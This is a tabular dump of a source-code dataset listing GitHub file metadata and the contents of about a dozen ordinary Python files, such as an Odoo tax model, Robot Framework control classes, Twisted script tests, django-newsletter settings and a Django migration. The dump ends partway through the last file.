blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f0de2600bd1e07a39f42bbe91fae645d210e66f7
|
e489172f6e49e1239db56c047a78a29a6ffc0b36
|
/via_account_taxform/account_tax.py
|
b1245ef236db95e377f0531f854b5c0588e892e0
|
[] |
no_license
|
eksotama/prln-via-custom-addons
|
f05d0059353ae1de89ccc8d1625a896c0215cfc7
|
f2b44a8af0e7bee87d52d258fca012bf44ca876f
|
refs/heads/master
| 2020-03-25T19:49:08.117628
| 2015-12-01T07:29:43
| 2015-12-01T07:29:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,478
|
py
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# Vikasa Infinity Anugrah, PT
# Copyright (c) 2011 - 2013 Vikasa Infinity Anugrah <http://www.infi-nity.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
##############################################################################
from osv import fields, osv
class account_tax(osv.osv):
_inherit = "account.tax"
def _get_tax_category(self, cr, uid, context=None):
res = self.pool.get('code.decode').get_company_selection_for_category(cr, uid, 'via_account_taxform', 'tax_category', context=context)
return res
_columns = {
'tax_category': fields.selection(_get_tax_category, 'Tax Category'),
}
account_tax()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
[
"aero@aero.(none)"
] |
aero@aero.(none)
|
a2514f32e71a028a6e1421e5456b756a92898f22
|
ccfc0566cd646cbe1837affef08baec8cd245d3b
|
/src/robot/model/control.py
|
bafd41a03b8be08ca4906403ab2cae40e68f9a71
|
[
"Apache-2.0",
"CC-BY-3.0"
] |
permissive
|
bmalhi/robotframework
|
9f395d3197cdd7925b8def3aeb50b14fc31e83e2
|
eaadffabc98b587c108cc904e0e54ce368020dd7
|
refs/heads/master
| 2023-03-01T14:30:23.110935
| 2021-02-05T16:01:30
| 2021-02-05T16:02:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,750
|
py
|
# Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from robot.utils import setter, py3to2
from .body import Body, BodyItem
from .keyword import Keywords
@py3to2
@Body.register
class For(BodyItem):
type = BodyItem.FOR_TYPE
body_class = Body
repr_args = ('variables', 'flavor', 'values')
__slots__ = ['variables', 'flavor', 'values']
deprecate_keyword_attributes = True
def __init__(self, variables=(), flavor='IN', values=(), parent=None):
self.variables = variables
self.flavor = flavor
self.values = values
self.parent = parent
self.body = None
@setter
def body(self, body):
return self.body_class(self, body)
@property
def keywords(self):
"""Deprecated since Robot Framework 4.0. Use :attr:`body` instead."""
return Keywords(self, self.body)
@keywords.setter
def keywords(self, keywords):
Keywords.raise_deprecation_error()
@property
def source(self):
return self.parent.source if self.parent is not None else None
def visit(self, visitor):
visitor.visit_for(self)
def __str__(self):
variables = ' '.join(self.variables)
values = ' '.join(self.values)
return u'FOR %s %s %s' % (variables, self.flavor, values)
@py3to2
@Body.register
class If(BodyItem):
body_class = Body
repr_args = ('condition', 'type')
__slots__ = ['condition', 'type', '_orelse']
deprecate_keyword_attributes = True
def __init__(self, condition=None, type=BodyItem.IF_TYPE, parent=None):
self.condition = condition
self.type = type
self.parent = parent
self.body = None
self._orelse = None
@setter
def body(self, body):
return self.body_class(self, body)
@property # Cannot use @setter because it would create orelses recursively.
def orelse(self):
if self._orelse is None and self:
self._orelse = type(self)(type=None, parent=self)
return self._orelse
@orelse.setter
def orelse(self, orelse):
if orelse is None:
self._orelse = None
elif not isinstance(orelse, type(self)):
raise TypeError("Only %s objects accepted, got %s."
% (type(self).__name__, type(orelse).__name__))
else:
orelse.parent = self
self._orelse = orelse
@property
def source(self):
return self.parent.source if self.parent is not None else None
def config(self, **attributes):
BodyItem.config(self, **attributes)
if self.type is None:
self.type = self.ELSE_IF_TYPE if self.condition else self.ELSE_TYPE
return self
def visit(self, visitor):
if self:
visitor.visit_if(self)
def __str__(self):
if not self:
return u'None'
if not isinstance(self.parent, If):
return u'IF %s' % self.condition
if self.condition:
return u'ELSE IF %s' % self.condition
return u'ELSE'
def __bool__(self):
return self.type is not None
|
[
"peke@iki.fi"
] |
peke@iki.fi
|
c253c273fb8c240f6eda595e492a460e88fd798c
|
ebdb33a86794a779714318f8a0b8397c3d6002b5
|
/processing/state_processing_dataframe.py
|
04a3eff325b03a22706837096af11c0d1c700efc
|
[] |
no_license
|
ShabbirHasan1/interactive-corporate-report
|
b52c6c404a3b2f96f27b3770b7086a59400fb74a
|
ce0d81ab775ded84334ce599950dae9adaa978c5
|
refs/heads/master
| 2023-05-16T17:15:52.651033
| 2020-02-20T05:32:46
| 2020-02-20T05:32:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,326
|
py
|
import plotly.plotly as py
import pandas as pd
import numpy as np
import os
import _pickle as pickle
# rd = pd.read_csv('https://raw.githubusercontent.com/plotly/datasets/master/2011_us_ag_exports.csv')
my_path = os.path.abspath(os.path.dirname('__file__'))
path_in_file = os.path.join(my_path, "../data/google/addresses_google.csv")
df_own = pd.read_csv(path_in_file)
path_in_ngrams = os.path.join(my_path, "../data/cpickle/")
df_own = df_own[df_own["country"] == "United States"].reset_index(drop=True)
df_own = df_own.fillna(df_own.mean())
df_own = df_own.rename(columns={"city_long": "state", "city_short": "code", "Female": "Female Rating"
, "Male": "Male Rating", "Patrons": "Patrons Rating", 'Average Customer Network': 'Connectedness',
"Male": "Male Rating", "Patrons": "Patrons Rating",
'Food Aestheticist': 'Food Aestheticist Rating',
'High Network': 'High Network Rating', 'Low Network': 'Low Network Rating',
'Connoisseur': 'Connoisseur Rating'})
df_own.loc[:, ["Total Network", "Number of Reviewers"]] = df_own.loc[:,
["Total Network", "Number of Reviewers"]].applymap(np.int32)
df_own.loc[:, ['Male to Female', 'Foreign to Local',
'Male Rating', 'Female Rating', 'Local', 'Foreign',
'High Network Rating', 'Low Network Rating', 'Connoisseur Rating',
'Food Aestheticist Rating', 'Patrons Rating', 'First Visit',
'Visual Importance', 'Female Importance', 'Foreign Importance',
'Connectedness', 'Average Rating']] = df_own.loc[:, ['Male to Female', 'Foreign to Local',
'Male Rating', 'Female Rating', 'Local', 'Foreign',
'High Network Rating', 'Low Network Rating',
'Connoisseur Rating',
'Food Aestheticist Rating', 'Patrons Rating',
'First Visit',
'Visual Importance', 'Female Importance',
'Foreign Importance',
'Connectedness', 'Average Rating']].applymap(
np.float32).round(3)
df_own.replace({'county': {'Anchorage': 'Anchorage Borough', 'Fairbanks North Star': 'Fairbanks North Star Borough',
'Matanuska-Susitna': 'Matanuska-Susitna Borough'}})
df_own["county_state"] = df_own["county"] + ", " + df_own["code"]
us = df_own[df_own["country"] == "United States"].reset_index(drop=True)
sep = us[["Total Network", "Number of Reviewers", "code"]]
us = us.drop(["Total Network", "Number of Reviewers"], axis=1)
all_firms_mean = us.groupby("code").mean().reset_index()
all_firms_sum = sep.groupby("code").sum().reset_index()
all_firms = pd.concat((all_firms_mean, all_firms_sum), axis=1)
all_firms.drop(["Unnamed: 0"], axis=1, inplace=True)
all_firms = all_firms.iloc[:, 1:]
all_dicts = {}
for i in df_own["target_small_name"].unique():
firm_lvl = df_own[df_own["target_small_name"] == i].reset_index()
sep_fir = firm_lvl[["Total Network", "Number of Reviewers", "code"]]
firm_lvl = firm_lvl.drop(["Total Network", "Number of Reviewers"], axis=1)
firm_lvl = firm_lvl.groupby("code").mean().reset_index()
sep_fir = sep_fir.groupby("code").sum().reset_index()
firms = pd.concat((firm_lvl, sep_fir), axis=1)
firms.drop(["index", "Unnamed: 0"], axis=1, inplace=True)
firms = firms.iloc[:, 1:]
all_dicts[i] = firms
all_dicts["All"] = all_firms
pickle.dump(all_dicts, open(path_in_ngrams + "all_dicts_state.p", "wb"))
# go = input_fields["short_name"].tolist()
# go.append("All")
# [dict(args=['z', value["Female"] ], label=key, method='restyle') for key, value in all_dicts.items()]
# updatemenus=list([dict(buttons = [[dict(args=['z', value["Female"] ], label=key, method='update') for key, value in all_dicts.items()]])])
|
[
"islashires@gmail.com"
] |
islashires@gmail.com
|
062ad9dc571345a7f470daa1d624c95fab71381b
|
8f21513b8ba9e583246908006cac98e5e473e245
|
/2_date_time.py
|
4e845b6d46313ee7c1aa2f575d6f4ed98c8d58b0
|
[] |
no_license
|
MatsakB/Lesson3
|
6335bdeb86e3216e4576c170096d7bcf57ec4b2d
|
69493f147720ac7d975421d7400e6964ecfac3a2
|
refs/heads/master
| 2020-04-10T06:35:22.069664
| 2018-12-08T08:45:20
| 2018-12-08T08:45:20
| 160,859,025
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 556
|
py
|
from datetime import datetime, timedelta
date_today = datetime.now()
delta_days = timedelta(days=1)
delta_months = timedelta(days=30)
date_yesterday = date_today-delta_days
date_month_before = date_today-delta_months
print(date_today.strftime('%d.%m.%y'))
print(date_yesterday.strftime('%d.%m.%y'))
print(date_month_before.strftime('%d.%m.%y'))
#Превратите строку "01/01/17 12:10:03.234567" в объект datetime
d = "01/01/17 12:10:03.234567"
d_datetime_object = datetime.strptime(d,'%d/%m/%y %H:%M:%S.%f')
print(d_datetime_object)
|
[
"you@example.com"
] |
you@example.com
|
dc768c5a2982a554ecbde52148df68d05e357efd
|
b167407960a3b69b16752590def1a62b297a4b0c
|
/tools/project-creator/Python2.6.6/Lib/test/test_transformer.py
|
eb8ef8ab031ce6e160d63f4fdf244baf063d4060
|
[
"MIT"
] |
permissive
|
xcode1986/nineck.ca
|
543d1be2066e88a7db3745b483f61daedf5f378a
|
637dfec24407d220bb745beacebea4a375bfd78f
|
refs/heads/master
| 2020-04-15T14:48:08.551821
| 2019-01-15T07:36:06
| 2019-01-15T07:36:06
| 164,768,581
| 1
| 1
|
MIT
| 2019-01-15T08:30:27
| 2019-01-09T02:09:21
|
C++
|
UTF-8
|
Python
| false
| false
| 1,146
|
py
|
import unittest
from test import test_support
# Silence Py3k warning
test_support.import_module('compiler', deprecated=True)
from compiler import transformer, ast
from compiler import compile
class Tests(unittest.TestCase):
def testMultipleLHS(self):
""" Test multiple targets on the left hand side. """
snippets = ['a, b = 1, 2',
'(a, b) = 1, 2',
'((a, b), c) = (1, 2), 3']
for s in snippets:
a = transformer.parse(s)
assert isinstance(a, ast.Module)
child1 = a.getChildNodes()[0]
assert isinstance(child1, ast.Stmt)
child2 = child1.getChildNodes()[0]
assert isinstance(child2, ast.Assign)
# This actually tests the compiler, but it's a way to assure the ast
# is correct
c = compile(s, '<string>', 'single')
vals = {}
exec c in vals
assert vals['a'] == 1
assert vals['b'] == 2
def test_main():
test_support.run_unittest(Tests)
if __name__ == "__main__":
test_main()
|
[
"278688386@qq.com"
] |
278688386@qq.com
|
f144fec17ff955f0806f4a5f976eb5a2072ff5dc
|
92ae735d5dc6f6a094daedbd32614e714d0b8c4a
|
/newsletter/settings.py
|
9ab91d32d35e7f7387b06c550e337e75ac0022a6
|
[
"MIT"
] |
permissive
|
Williano/Final-Senior-Year-Project-
|
3b01ac9fd85753720b01c2245cf9b71648aad35d
|
4bd988575537b37b5cf852b616d3db5666c95e7f
|
refs/heads/master
| 2023-08-07T16:11:42.778492
| 2023-06-05T04:59:06
| 2023-06-05T04:59:06
| 121,346,340
| 173
| 60
|
MIT
| 2023-06-05T04:59:07
| 2018-02-13T06:17:16
|
Python
|
UTF-8
|
Python
| false
| false
| 3,167
|
py
|
from importlib import import_module
from django.conf import settings as django_settings
from django.core.exceptions import ImproperlyConfigured
from .utils import Singleton
class Settings(object):
"""
A settings object that proxies settings and handles defaults, inspired
by `django-appconf` and the way it works in `django-rest-framework`.
By default, a single instance of this class is created as `<app>_settings`,
from which `<APP>_SETTING_NAME` can be accessed as `SETTING_NAME`, i.e.::
from myapp.settings import myapp_settings
if myapp_settings.SETTING_NAME:
# DO FUNKY DANCE
If a setting has not been explicitly defined in Django's settings, defaults
can be specified as `DEFAULT_SETTING_NAME` class variable or property.
"""
__metaclass__ = Singleton
def __init__(self):
"""
Assert app-specific prefix.
"""
assert hasattr(self, 'settings_prefix'), 'No prefix specified.'
def __getattr__(self, attr):
"""
Return Django setting `PREFIX_SETTING` if explicitly specified,
otherwise return `PREFIX_SETTING_DEFAULT` if specified.
"""
if attr.isupper():
# Require settings to have uppercase characters
try:
setting = getattr(
django_settings,
'%s_%s' % (self.settings_prefix, attr),
)
except AttributeError:
if not attr.startswith('DEFAULT_'):
setting = getattr(self, 'DEFAULT_%s' % attr)
else:
raise
return setting
else:
# Default behaviour
raise AttributeError(
'No setting or default available for \'%s\'' % attr
)
class NewsletterSettings(Settings):
""" Django-newsletter specific settings. """
settings_prefix = 'NEWSLETTER'
DEFAULT_CONFIRM_EMAIL = True
@property
def DEFAULT_CONFIRM_EMAIL_SUBSCRIBE(self):
return self.CONFIRM_EMAIL
@property
def DEFAULT_CONFIRM_EMAIL_UNSUBSCRIBE(self):
return self.CONFIRM_EMAIL
@property
def DEFAULT_CONFIRM_EMAIL_UPDATE(self):
return self.CONFIRM_EMAIL
@property
def RICHTEXT_WIDGET(self):
# Import and set the richtext field
NEWSLETTER_RICHTEXT_WIDGET = getattr(
django_settings, "NEWSLETTER_RICHTEXT_WIDGET", ""
)
if NEWSLETTER_RICHTEXT_WIDGET:
try:
module, attr = NEWSLETTER_RICHTEXT_WIDGET.rsplit(".", 1)
mod = import_module(module)
return getattr(mod, attr)
except Exception as e:
# Catch ImportError and other exceptions too
# (e.g. user sets setting to an integer)
raise ImproperlyConfigured(
"Error while importing setting "
"NEWSLETTER_RICHTEXT_WIDGET %r: %s" % (
NEWSLETTER_RICHTEXT_WIDGET, e
)
)
return None
newsletter_settings = NewsletterSettings()
|
[
"paawilly17@gmail.com"
] |
paawilly17@gmail.com
|
ff3771b5c0f1674a5c668a6a8e2b5f78017cab70
|
d83fde3c891f44014f5339572dc72ebf62c38663
|
/_bin/google-cloud-sdk/.install/.backup/lib/googlecloudsdk/api_lib/auth/exceptions.py
|
b07bd1f9d71b922ba849cb4dc2a0eac9562fdd33
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
gyaresu/dotfiles
|
047cc3ca70f4b405ba272856c69ee491a79d2ebe
|
e5e533b3a081b42e9492b228f308f6833b670cfe
|
refs/heads/master
| 2022-11-24T01:12:49.435037
| 2022-11-01T16:58:13
| 2022-11-01T16:58:13
| 17,139,657
| 1
| 1
| null | 2020-07-25T14:11:43
| 2014-02-24T14:59:59
|
Python
|
UTF-8
|
Python
| false
| false
| 1,206
|
py
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""User errors raised by auth commands."""
from __future__ import absolute_import
from __future__ import unicode_literals
from googlecloudsdk.core import exceptions
class AuthenticationError(exceptions.Error):
"""Raised for errors reported by Oauth2client library."""
class InvalidCredentialsError(exceptions.Error):
"""Raised if credentials are not usable."""
class WrongAccountError(exceptions.Error):
"""Raised when credential account does not match expected account."""
class GitCredentialHelperError(exceptions.Error):
"""Raised for issues related to passing auth credentials to Git."""
|
[
"me@gareth.codes"
] |
me@gareth.codes
|
a2859f4ac719600fa16c18391c0265afda7857f5
|
238e46a903cf7fac4f83fa8681094bf3c417d22d
|
/VTK/vtk_7.1.1_x64_Release/lib/python2.7/site-packages/twisted/scripts/test/test_scripts.py
|
8705a90f7287a1f2a71871bea4ec36b22d67d56a
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
baojunli/FastCAE
|
da1277f90e584084d461590a3699b941d8c4030b
|
a3f99f6402da564df87fcef30674ce5f44379962
|
refs/heads/master
| 2023-02-25T20:25:31.815729
| 2021-02-01T03:17:33
| 2021-02-01T03:17:33
| 268,390,180
| 1
| 0
|
BSD-3-Clause
| 2020-06-01T00:39:31
| 2020-06-01T00:39:31
| null |
UTF-8
|
Python
| false
| false
| 6,855
|
py
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for the command-line scripts in the top-level I{bin/} directory.
Tests for actual functionality belong elsewhere, written in a way that doesn't
involve launching child processes.
"""
from os import devnull, getcwd, chdir
from sys import executable
from subprocess import PIPE, Popen
from twisted.trial.unittest import SkipTest, TestCase
from twisted.python.modules import getModule
from twisted.python.filepath import FilePath
from twisted.python.test.test_shellcomp import ZshScriptTestMixin
def outputFromPythonScript(script, *args):
"""
Synchronously run a Python script, with the same Python interpreter that
ran the process calling this function, using L{Popen}, using the given
command-line arguments, with standard input and standard error both
redirected to L{os.devnull}, and return its output as a string.
@param script: The path to the script.
@type script: L{FilePath}
@param args: The command-line arguments to follow the script in its
invocation (the desired C{sys.argv[1:]}).
@type args: L{tuple} of L{str}
@return: the output passed to the proces's C{stdout}, without any messages
from C{stderr}.
@rtype: L{bytes}
"""
nullInput = file(devnull, "rb")
nullError = file(devnull, "wb")
stdout = Popen([executable, script.path] + list(args),
stdout=PIPE, stderr=nullError, stdin=nullInput).stdout.read()
nullInput.close()
nullError.close()
return stdout
class ScriptTestsMixin:
"""
Mixin for L{TestCase} subclasses which defines a helper function for testing
a Twisted-using script.
"""
bin = getModule("twisted").pathEntry.filePath.child("bin")
def scriptTest(self, name):
"""
Verify that the given script runs and uses the version of Twisted
currently being tested.
This only works when running tests against a vcs checkout of Twisted,
since it relies on the scripts being in the place they are kept in
version control, and exercises their logic for finding the right version
of Twisted to use in that situation.
@param name: A path fragment, relative to the I{bin} directory of a
Twisted source checkout, identifying a script to test.
@type name: C{str}
@raise SkipTest: if the script is not where it is expected to be.
"""
script = self.bin.preauthChild(name)
if not script.exists():
raise SkipTest(
"Script tests do not apply to installed configuration.")
from twisted.copyright import version
scriptVersion = outputFromPythonScript(script, '--version')
self.assertIn(str(version), scriptVersion)
class ScriptTests(TestCase, ScriptTestsMixin):
"""
Tests for the core scripts.
"""
def test_twistd(self):
self.scriptTest("twistd")
def test_twistdPathInsert(self):
"""
The twistd script adds the current working directory to sys.path so
that it's able to import modules from it.
"""
script = self.bin.child("twistd")
if not script.exists():
raise SkipTest(
"Script tests do not apply to installed configuration.")
cwd = getcwd()
self.addCleanup(chdir, cwd)
testDir = FilePath(self.mktemp())
testDir.makedirs()
chdir(testDir.path)
testDir.child("bar.tac").setContent(
"import sys\n"
"print sys.path\n")
output = outputFromPythonScript(script, '-ny', 'bar.tac')
self.assertIn(repr(testDir.path), output)
def test_manhole(self):
self.scriptTest("manhole")
def test_trial(self):
self.scriptTest("trial")
def test_trialPathInsert(self):
"""
The trial script adds the current working directory to sys.path so that
it's able to import modules from it.
"""
script = self.bin.child("trial")
if not script.exists():
raise SkipTest(
"Script tests do not apply to installed configuration.")
cwd = getcwd()
self.addCleanup(chdir, cwd)
testDir = FilePath(self.mktemp())
testDir.makedirs()
chdir(testDir.path)
testDir.child("foo.py").setContent("")
output = outputFromPythonScript(script, 'foo')
self.assertIn("PASSED", output)
def test_pyhtmlizer(self):
self.scriptTest("pyhtmlizer")
def test_tap2rpm(self):
self.scriptTest("tap2rpm")
def test_tap2deb(self):
self.scriptTest("tap2deb")
def test_tapconvert(self):
self.scriptTest("tapconvert")
def test_deprecatedTkunzip(self):
"""
The entire L{twisted.scripts.tkunzip} module, part of the old Windows
installer tool chain, is deprecated.
"""
from twisted.scripts import tkunzip
warnings = self.flushWarnings(
offendingFunctions=[self.test_deprecatedTkunzip])
self.assertEqual(DeprecationWarning, warnings[0]['category'])
self.assertEqual(
"twisted.scripts.tkunzip was deprecated in Twisted 11.1.0: "
"Seek unzipping software outside of Twisted.",
warnings[0]['message'])
self.assertEqual(1, len(warnings))
def test_deprecatedTapconvert(self):
"""
The entire L{twisted.scripts.tapconvert} module is deprecated.
"""
from twisted.scripts import tapconvert
warnings = self.flushWarnings(
offendingFunctions=[self.test_deprecatedTapconvert])
self.assertEqual(DeprecationWarning, warnings[0]['category'])
self.assertEqual(
"twisted.scripts.tapconvert was deprecated in Twisted 12.1.0: "
"tapconvert has been deprecated.",
warnings[0]['message'])
self.assertEqual(1, len(warnings))
class ZshIntegrationTestCase(TestCase, ZshScriptTestMixin):
"""
Test that zsh completion functions are generated without error
"""
generateFor = [('twistd', 'twisted.scripts.twistd.ServerOptions'),
('trial', 'twisted.scripts.trial.Options'),
('pyhtmlizer', 'twisted.scripts.htmlizer.Options'),
('tap2rpm', 'twisted.scripts.tap2rpm.MyOptions'),
('tap2deb', 'twisted.scripts.tap2deb.MyOptions'),
('tapconvert', 'twisted.scripts.tapconvert.ConvertOptions'),
('manhole', 'twisted.scripts.manhole.MyOptions')
]
|
[
"l”ibaojunqd@foxmail.com“"
] |
l”ibaojunqd@foxmail.com“
|
70bc331f3ab7dcdf0904d00a928becf959b12a5e
|
f3bd271bf00325881fb5b2533b9ef7f7448a75ec
|
/xcp2k/classes/_wf_correlation1.py
|
946851bae269b8bc3790a4acf9f9905235827943
|
[] |
no_license
|
obaica/xcp2k
|
7f99fc9d494859e16b9b0ea8e217b0493f4b2f59
|
6e15c2c95658f545102595dc1783f5e03a9e6916
|
refs/heads/master
| 2020-07-15T17:27:43.378835
| 2019-02-11T16:32:24
| 2019-02-11T16:32:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,305
|
py
|
from xcp2k.inputsection import InputSection
from _mp2_info1 import _mp2_info1
from _direct_canonical1 import _direct_canonical1
from _wfc_gpw1 import _wfc_gpw1
from _ri_mp21 import _ri_mp21
from _opt_ri_basis1 import _opt_ri_basis1
from _ri_rpa1 import _ri_rpa1
from _ri_laplace1 import _ri_laplace1
from _cphf1 import _cphf1
from _interaction_potential3 import _interaction_potential3
from _eri_mme2 import _eri_mme2
class _wf_correlation1(InputSection):
def __init__(self):
InputSection.__init__(self)
self.Method = None
self.Memory = None
self.Scale_s = None
self.Scale_t = None
self.Group_size = None
self.Row_block = None
self.Col_block = None
self.Calc_cond_num = None
self.Ri_metric = None
self.Eri_method = None
self.Eri_blksize = None
self.Minimal_gap = None
self.MP2_INFO = _mp2_info1()
self.DIRECT_CANONICAL = _direct_canonical1()
self.WFC_GPW = _wfc_gpw1()
self.RI_MP2 = _ri_mp21()
self.OPT_RI_BASIS = _opt_ri_basis1()
self.RI_RPA = _ri_rpa1()
self.RI_LAPLACE = _ri_laplace1()
self.CPHF = _cphf1()
self.INTERACTION_POTENTIAL = _interaction_potential3()
self.ERI_MME = _eri_mme2()
self._name = "WF_CORRELATION"
self._keywords = {'Minimal_gap': 'MINIMAL_GAP', 'Group_size': 'GROUP_SIZE', 'Row_block': 'ROW_BLOCK', 'Calc_cond_num': 'CALC_COND_NUM', 'Scale_s': 'SCALE_S', 'Scale_t': 'SCALE_T', 'Memory': 'MEMORY', 'Eri_method': 'ERI_METHOD', 'Col_block': 'COL_BLOCK', 'Method': 'METHOD', 'Eri_blksize': 'ERI_BLKSIZE', 'Ri_metric': 'RI_METRIC'}
self._subsections = {'MP2_INFO': 'MP2_INFO', 'RI_RPA': 'RI_RPA', 'WFC_GPW': 'WFC_GPW', 'RI_LAPLACE': 'RI_LAPLACE', 'RI_MP2': 'RI_MP2', 'CPHF': 'CPHF', 'INTERACTION_POTENTIAL': 'INTERACTION_POTENTIAL', 'OPT_RI_BASIS': 'OPT_RI_BASIS', 'ERI_MME': 'ERI_MME', 'DIRECT_CANONICAL': 'DIRECT_CANONICAL'}
self._aliases = {'Row_block_size': 'Row_block', 'Number_proc': 'Group_size', 'Col_block_size': 'Col_block', 'Calc_condition_number': 'Calc_cond_num', 'Ri': 'Ri_metric'}
@property
def Number_proc(self):
"""
See documentation for Group_size
"""
return self.Group_size
@property
def Row_block_size(self):
"""
See documentation for Row_block
"""
return self.Row_block
@property
def Col_block_size(self):
"""
See documentation for Col_block
"""
return self.Col_block
@property
def Calc_condition_number(self):
"""
See documentation for Calc_cond_num
"""
return self.Calc_cond_num
@property
def Ri(self):
"""
See documentation for Ri_metric
"""
return self.Ri_metric
@Number_proc.setter
def Number_proc(self, value):
self.Group_size = value
@Row_block_size.setter
def Row_block_size(self, value):
self.Row_block = value
@Col_block_size.setter
def Col_block_size(self, value):
self.Col_block = value
@Calc_condition_number.setter
def Calc_condition_number(self, value):
self.Calc_cond_num = value
@Ri.setter
def Ri(self, value):
self.Ri_metric = value
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
7588e0b50d82ff81490c180db39e55febd0d85ab
|
f8bdc46409c9f5eaf3d85ef157260589462d941a
|
/demos/instance_occlsegm/examples/synthetic2d/legacy/view_arc2017_occlusion.py
|
408b6b042140818b8b6f50d4e6382df6fedf1f5c
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
start-jsk/jsk_apc
|
2e268f8b65e9d7f4f9cc4416dc8383fd0a7b9750
|
c4e349f45ef38457dc774e33f6902acf1a1540a6
|
refs/heads/master
| 2023-09-05T09:06:24.855510
| 2023-09-01T17:10:12
| 2023-09-01T17:10:12
| 25,620,908
| 36
| 25
|
NOASSERTION
| 2023-09-01T17:10:14
| 2014-10-23T05:28:31
|
Common Lisp
|
UTF-8
|
Python
| false
| false
| 1,604
|
py
|
#!/usr/bin/env python
import chainer_mask_rcnn
import instance_occlsegm_lib
import contrib
if __name__ == '__main__':
dataset = contrib.datasets.ARC2017OcclusionDataset(
split='train', do_aug=True)
def visualize_func(dataset, index):
img, bboxes, labels, lbls = dataset[index]
class_names = dataset.class_names
captions = [class_names[l] for l in labels]
vizs = []
for bbox, label, lbl, caption in \
zip(bboxes, labels, lbls, captions):
mask_bg = lbl == 0
mask_visible = lbl == 1
mask_invisible = lbl == 2
viz = chainer_mask_rcnn.utils.draw_instance_bboxes(
img, [bbox], [label], n_class=len(class_names),
masks=[mask_bg], captions=[caption])
vizs.append(viz)
viz = chainer_mask_rcnn.utils.draw_instance_bboxes(
img, [bbox], [label], n_class=len(class_names),
masks=[mask_visible], captions=[caption])
vizs.append(viz)
viz = chainer_mask_rcnn.utils.draw_instance_bboxes(
img, [bbox], [label], n_class=len(class_names),
masks=[mask_invisible], captions=[caption])
vizs.append(viz)
viz = instance_occlsegm_lib.image.tile(
vizs, (max(1, len(vizs) // 3), 3))
return viz
instance_occlsegm_lib.datasets.view_dataset(dataset, visualize_func)
# viz = instance_occlsegm_lib.image.resize(viz, size=1000 * 1000)
# instance_occlsegm_lib.io.imshow(viz)
# instance_occlsegm_lib.io.waitkey()
|
[
"www.kentaro.wada@gmail.com"
] |
www.kentaro.wada@gmail.com
|
3e7af994a6235be22aa1a34320c806ffcc69e7cd
|
0ca1d8363439e0e34d7eaa54f021ff0b2940cac7
|
/facturacion/migrations/0016_auto_20181130_1741.py
|
8521ce266772004f3ca7a4e556672f389672ca4b
|
[] |
no_license
|
geovanniberdugo/medhis
|
d6b606ef2c391738ee5fa4209712b6c0eb01ae40
|
b8f8df111432bfab537853ed8e8dbd4603e9707d
|
refs/heads/main
| 2023-02-13T19:44:33.699689
| 2021-01-15T22:08:35
| 2021-01-15T22:08:35
| 330,032,390
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 520
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-11-30 22:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('facturacion', '0015_auto_20181120_1824'),
]
operations = [
migrations.AlterField(
model_name='caja',
name='verificacion_correcta',
field=models.BooleanField(default=True, help_text='Indica si los valores son correctos'),
),
